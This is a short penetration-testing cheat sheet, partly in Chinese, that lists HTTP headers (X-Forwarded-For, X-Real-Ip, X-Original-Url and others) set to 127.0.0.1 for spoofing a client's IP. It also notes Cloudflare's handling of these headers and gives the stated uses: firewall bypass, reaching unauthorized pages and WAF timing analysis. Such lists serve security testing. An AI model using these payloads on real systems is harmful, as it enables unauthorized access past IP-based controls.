# [Pentest] HTTP IP Forge Base-Url: 127.0.0.1 Http-Url: 127.0.0.1 Proxy-Host: 127.0.0.1 Proxy-Url: 127.0.0.1 Real-Ip: 127.0.0.1 Redirect: 127.0.0.1 Referer: 127.0.0.1 Referrer: 127.0.0.1 Refferer: 127.0.0.1 Request-Uri: 127.0.0.1 Uri: 127.0.0.1 Url: 127.0.0.1 --- Client-IP: 127.0.0.1 X-Cluster-Client-IP: 127.0.0.1 X-Client-IP: 127.0.0.1 X-Custom-IP-Authorization: 127.0.0.1 X-Forward-For: 127.0.0.1 X-Forwarded-By: 127.0.0.1 X-For-Original: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Forwarded-Host: 127.0.0.1 X-Forwarded-Server: 127.0.0.1 X-Forwarded: 127.0.0.1 X-Forwarder-For: 127.0.0.1 X-Host: 127.0.0.1 X-Http-Destinationurl: 127.0.0.1 X-Http-Host-Override: 127.0.0.1 X-Original-Remote-Addr: 127.0.0.1 X-Original-Url: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Proxy-Url: 127.0.0.1 X-Real-Ip: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Rewrite-Url: 127.0.0.1 X-True-IP: 127.0.0.1 via: 127.0.0.1 --- cloudflare： X-Forwarded-For CF-Connecting-IP Fastly-Client-Ip True-Client-Ip X-Real-IP - adds headers to reqs to the origin server (by default), but doesn't allow to rewrite them ``` CF-IPCountry: MT X-Forwarded-For: 1.1.1.1,22.22.22.22 CF-RAY: 4769ea42a630be43-MXP X-Forwarded-Proto: http CF-Visitor: {"scheme":"http"} CF-Connecting-IP: 22.22.22.22 Accept-Encoding: gzip ``` - we can send our values in X-Forwarded-For and it will be prepand to CF's request (ip_from_us, real_ip) - doesn't allow rewrite CF-Connecting-IP (403) https://github.com/GrrrDog/weird_proxies/blob/master/Cloudflare.md --- X-Forwarded-Port: 443 X-Forwarded-Port: 4443 X-Forwarded-Port: 80 X-Forwarded-Port: 8080 X-Forwarded-Port: 8443 X-Forwarded-Scheme: http X-Forwarded-Scheme: https ## 用途 - 防火牆繞過 - 直接顯示未經授權頁面 - 時間差分析攻擊 - ex：一般`403`擋下回應時間：50ms，繞過WAF`403`回應時間：5ms -